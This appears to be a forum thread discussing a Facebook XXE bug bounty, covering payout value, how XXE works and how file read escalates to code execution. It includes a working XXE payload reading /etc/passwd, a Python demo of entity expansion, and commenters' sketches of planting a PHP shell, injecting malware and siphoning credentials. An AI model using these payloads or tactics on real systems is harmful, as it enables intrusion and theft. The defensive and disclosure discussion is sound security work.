I'm curious: how much time would you say you worked on researching and identifying this bug? BTW, I don't begrudge you the payout one little bit, no matter how long you spent on it; such an amount is change down the back of the sofa for facebook, and the potential impact of the bug means they got a great deal!
Well, I originally found the OpenID bug in 2012, but hadn't noticed Facebook was vulnerable until very recently. After I found their OpenID endpoint, the hardest part was getting them to make a Yadis discovery request to me. Then I had to squash a little bug in the exploit. Most of the time was spent re-reading the OpenID spec. I'd say the total amount of work (including the time it took me to write the post) was about 2 days.
As I said in the post, I already had a strong suspicion that, once I could read files, escalating to RCE would be easy. But I decided not to do it without permission, and they fixed the bug very quickly. As much as I'd have loved to actually see the output of an ls or something like that, I think I made the right call.
I quoted that as a joke. I'm too familiar with bug bounties to ever expect one million dollars as reward for a bug. Let's hope people don't take it seriously. Lesson learned: since I'm not a native speaker, I shouldn't joke unless the joke is obvious.
A bug that lets you execute code on Facebook's servers is worth millions if not billions of dollars. You'll be rewarded with much less than that, but considering Facebook's market cap it is extraordinarily valuable.
No, it is not worth "millions or billions". It is worth whatever anyone is willing to pay for it. Since Facebook has very aggressive monitoring and will shut down hacks quite rapidly, the ROI for a bug like this would have to be realised very quickly, say on the order of days (or maybe even hours) rather than months. How would you monetise 1 week of running code on Facebook? Injecting malware would get the whole thing shut down even faster, so you'd have to either go passive or operate in a reduced window of opportunity.
There are no legal entities that would buy the bug: the USG can access any data with a warrant (that's free) vs. "millions or billions", and any other law enforcement agency could do the same thing. There is really no value there to them. So it would have to be blackhats, and that means some idiotic Russians mass-owning everyone with old Java bugs. Again: not worth much.
This sort of bug has very little value, except to facebook.
The part of the work you don't see is the hours, days and months, usually unpaid, spent auditing code to find the bugs.
It is like the anecdote about Tesla and Ford and knowing where to put the X: you aren't paying for time or manual labour. Bug value is derived from how much damage it can cause, what it's worth to Facebook not to be exploited, and what the exploit is worth to the bad guys on the black market.
You pay for results, not for time. And you can use an existing market to define a price.
Time is often used to measure compensation (lawyers are well known for being paid in hourly fees), but in the long run only results count. And concerning the market: for how much could this bug have been sold, for example to the NSA?
HP's WebInspect, a blackbox testing tool, can also find XXEs. However, as the OP shows, XXEs can be tricky and involve a lot of nuance to coax out. General dynamic testing tools aren't as good at uncovering XXEs as static analysis tools.
Disclaimer: I used to work on WebInspect's audit engines
Since this sounds like it affects a lot of people in a lot of places, I went about auditing my own code and found that if you're using libxml2 >= 2.9.0, you should be safe unless you're explicitly requesting entity expansion.
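My exact audit snippet isn't worth reproducing, but the underlying point is easy to illustrate with a hedged stdlib sketch: whether external entities get expanded is usually a single parser switch (in libxml2's case, options like substituting entities; in Python's `xml.sax`, the `feature_external_ges` flag, which I use here as a stand-in).

```python
import io
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects all character data the parser emits."""
    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def extract_text(xml_bytes, expand_external_entities):
    parser = xml.sax.make_parser()
    # This single flag is the "explicitly requesting entity expansion"
    # switch for external general entities.
    parser.setFeature(feature_external_ges, expand_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.chunks)


# Stand-in for /etc/passwd: a local file the attacker wants to read.
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
    f.write("root:x:0:0:root:/root:/bin/bash")
    secret_path = f.name

payload = (
    '<?xml version="1.0"?>\n'
    f'<!DOCTYPE r [<!ENTITY xxe SYSTEM "file://{secret_path}">]>\n'
    '<r>&xxe;</r>'
).encode()

print(extract_text(payload, expand_external_entities=True))   # local file contents leak
print(extract_text(payload, expand_external_entities=False))  # entity silently skipped
```

With the flag off, the undefined external entity is simply skipped; with it on, the parser happily fetches the file:// URL and hands the attacker its contents.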
For the nokogiri users, there are a couple of proofs-of-concept in this ticket: https://github.com/sparklemotion/nokogiri/issues/693 - they should be patched with modern versions of nokogiri and libxml2, but if you're running older versions, you might want to verify their behavior before someone else does it for you.
Yes, XML is data, but it allows you to specify where other data is located that should be included when processing it. These links can point to additional data, or to definitions of how to process the data in the document (XML entities). It's a simplification, but it's as if XML can have #includes, where the source of the #include is a URL, and can even be a file:/// URL.
So the attack looks like this: the server takes input from an evil user and inserts it into an XML document in memory. The input is malicious, and contains not only XML data but XML directives to include other documents, specifically /etc/passwd on the local machine. When the XML document is processed, the contents of /etc/passwd are automatically read by the XML parser. However, the data is not in the expected format, and the parser spits out a detailed error message showing the data that could not be parsed, which is the contents of /etc/passwd.
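As a concrete (hypothetical) payload, the malicious input could look something like this, where the DOCTYPE defines an external entity that the parser dereferences when expanding &xxe;:

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
```

If the application expects <foo> to contain, say, a number, validation fails and a verbose error message echoes the expanded value, i.e. the contents of /etc/passwd, straight back to the attacker.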
Sure it makes sense; what doesn't make sense is the library reading anything that is thrown at it.
I'm thinking there should be a "root path" from which the library is able to access files. Sure, you want to include "base.xml": it's in a specific directory, the library is allowed to read only that directory, and no "../../../../etc/passwd" tricks.
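That kind of containment check is easy to sketch. Here's a hypothetical helper (not part of any XML library) that resolves a requested include against a fixed root and rejects anything that escapes it:

```python
import os


def resolve_within_root(root, requested):
    """Return the absolute path of `requested` inside `root`,
    raising PermissionError if it escapes the root."""
    root = os.path.realpath(root)
    # realpath collapses ".." components and follows symlinks,
    # so "../../etc/passwd" can't sneak past the prefix check.
    candidate = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, candidate]) != root:
        raise PermissionError(f"{requested!r} escapes {root!r}")
    return candidate


# resolve_within_root("/srv/xml", "base.xml") is allowed;
# resolve_within_root("/srv/xml", "../../../../etc/passwd") raises PermissionError.
```

The important detail is resolving the path *before* the prefix comparison; a naive string check on the unresolved path is exactly what "../" tricks defeat.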
You don't really need to be a master of a specific language. You just have to understand general programming concepts. The hard part is getting the right approach to searching for vulnerabilities. Learning to recognize everywhere the target system is taking input and estimating what it is doing with that input is where the skill is at.
A lot of people think it's not enough money. In this case it appears to be about 30K USD.
Here's an issue with paying more: the security engineers it employs are paid around $100K to $150K a year.
Imagine you'd get paid $100K for a big exploit. It wouldn't be valuable to be a security engineer anymore (since you can't be paid additionally for finding the bugs); it would be better to be unemployed and spend your time finding the bugs.
I think that's one of the main issues, at least until bugs become extremely, extremely rare (which, really, they aren't: these stories are just the tip of the iceberg).
>and due to a valid scenario he theorized involving an administrative feature we are scheduled to deprecate soon, we decided to re-classify the issue as a potential RCE bug.
I imagine it might be some feature that could maybe be triggered internally through a file:// or http://localhost/ URL, and in doing so gain access to an interface that can issue shell commands. That's pure speculation though, and I'm probably way off.
Once you've got fs access, it's rarely extremely hard, unless the systems are very well protected from within (such as with RBAC and whatnot).
They never protect the systems from within that well, because generally it's more effort than it's worth (of course, the day a company goes bankrupt because of an RCE, they'll wish they'd spent the time; as usual with security).
Of course, it doesn't mean it's always possible. It's just likely.
Random scenario: since /etc/passwd is readable, that tells me the PHP config sucks. You could just write a PHP shell and run it via the web interface, or put the code in requests and read the log file (again, it's all about config: if PHP lets you read the file and doesn't restrict execution to .php files, bang; or if you can write a .php file, bang again).
The point really is that I rarely see people caring about protecting anything or following best practices once someone found a bug that affects the system (such as fs access).
My initial understanding is that the XXE flaw allows the attacker to read local files, or make network requests via the remote host (essentially, proxying them), but still only delivered to his client, rather than actually modifying or creating files on the remote host itself.
Remote read access is much more limited than remote write access, but even write access will be limited by file permissions, and doesn't necessarily translate to code execution.
Injecting some code into some of the web-app source that gets triggered by an additional request would probably be the easiest way, but you might also look for system binaries that get called by cron or similar.
Sounds like he didn't use any of these; it was actually some sort of local web-accessible (but externally firewalled) admin interface that a suitable request could exploit. I'm very curious how that part would work (especially how you'd know, or find out, about it as an outsider).
From the article, he says just shoot him an email.
> If you find this interesting and want to hire me to do a security focused review or penetration testing in your own (or your company's) code, don't hesitate to send me an email at
People here seem to have strongly misplaced expectations about what bug bounties pay. Vulnerabilities in web apps/servers tend to be worth less than vulnerabilities in client computers for a few reasons.
First, web app vulns are usually specific to a single site (unless, obviously, you find an issue in a common underlying framework, say a session fixation attack in how PHP or ASP.NET handles sessions).
Second, and much more importantly, the vast majority of sites don't have financially actionable information. Unless you handle banking/credit card info, I am limited in what I can do to extract value from the server (compared to a compromised client). There aren't that many vectors to extract value.
-Dump their list of usernames/passwords? OK, maybe some of those will also be used on other banking or commerce sites, but I have challenges/risks actually getting money out. And if I want stolen credit card numbers I can just buy them on carding forums.
-Serve sleazy advertising? OK, possible, but ads are a crappy business to be in and it's definitely a high-volume, long-term approach (ask how well Huffpo pays its writers). You can try affiliate spamming/stuffing, but again, not huge value. Both the ad and affiliate approaches depend on how much traffic the server you hacked gets. Low traffic, you make no money. The more traffic, the larger the site, the smarter and better equipped the IT/security team. How long do you really think an Alexa top 10 or top 100 site won't notice an IFRAME pointing to .ru or .cn?
-Mining cryptocurrency? Not financially viable
What usually happens when a server is compromised is that an exploit kit is installed and it's used to attack the visitors (specifically exploit a vulnerability in the client). And so we are back to attacking clients to extract value over attacking (most) websites. Why do this? Simple:
- There are orders of magnitude more desktops/browsers than web servers.
- They are running tons of diverse plugins and software so the attack surface is much larger.
- Most of that software will be out of date and have known vulnerabilities.
- Very few of these clients are "managed" by a dedicated IT person the way a web server is. The user is far less likely to notice anything bad.
All of that means I can reach more targets, compromise a larger number of them, and hold them for longer. Why is this better than pwning a server? Because lots of value-extraction scenarios that don't work on a handful of web servers do work when I have thousands and thousands of compromised clients:
-Show them ads
-Stuff affiliate links
-Change their DNS settings and MitM all their traffic (bank.com? Why, that's right over here!)
-Keylog them to actually steal financial data, credit cards, bank logins, etc.
-Use them to send spam
-Use them as a botnet to DDoS people and get paid protection money
To put this in perspective, very smart hackers doing crazy stuff to break out of Chrome's sandbox and exploit clients are getting $50-$100K in public contests like Pwn2Own. Getting $35,000 for an RCE is pretty awesome.
Getting drive-by traffic is one of the most expensive pieces of the puzzle for malware groups. Last time I checked the forums, a thousand visitors was selling for around a dollar, and that isn't even well qualified traffic.
Having access to Facebook and over a billion pageviews per hour would be worth millions to any group who is capable of handling that type of volume. If they were smart about it, they could probably get away with it for up to a day (the Yahoo malware was active for a day and they didn't obfuscate it much).
Back-of-the-envelope value is around $1M per hour, and that doesn't include the premium for the higher quality of traffic, but it does assume you find a way to inject across all the servers and somehow not display it to Facebook-internal IPs.
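For what it's worth, the envelope math, taking the ~$1 per thousand visitors figure above at face value and (generously) treating pageviews as visitors:

```python
pageviews_per_hour = 1_000_000_000  # "over a billion pageviews per hour", per the claim above
usd_per_thousand_visitors = 1.0     # rough underground price for unqualified drive-by traffic

# Value of an hour of injected traffic at bulk-market rates.
usd_per_hour = pageviews_per_hour / 1_000 * usd_per_thousand_visitors
print(f"${usd_per_hour:,.0f}/hour")  # $1,000,000/hour
```

Both inputs are the thread's own rough numbers, so treat the result as an order-of-magnitude guess, not a valuation.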
A big group with some fresh browser 0day would have loved to get their hands on this.
Considering Facebook's good security team (and Yahoo's notoriously poor one), I suspect they'd probably catch the malware and take some sort of emergency action in under an hour.
A much more devious attack would be modifying some of the code to silently siphon off login credentials, and grabbing the user database. Then once they were satisfied with that they could go with the malware route.
Exactly. Pivot from the server immediately to the clients by serving malware against the visiting browsers/plugins. Even if a large site detects what you are doing quickly and shuts you down, you've leveraged that into controlling thousands of desktop machines.
Is there some basis to your "fact" of bugs being bought for millions for a social networking site? I could understand if someone found a remote execution bug on Big Bank Corp's website allowing you to transfer anyone's funds to your personal BTC wallet.
Not at all. Your link is about someone finding an entirely new way to bypass protections/sandboxing in IE. That is an enormously impactful issue because it affects hundreds of millions of desktop PCs. Comparing that to an RCE affecting a few web servers, even at a site as large as FB, is misplaced.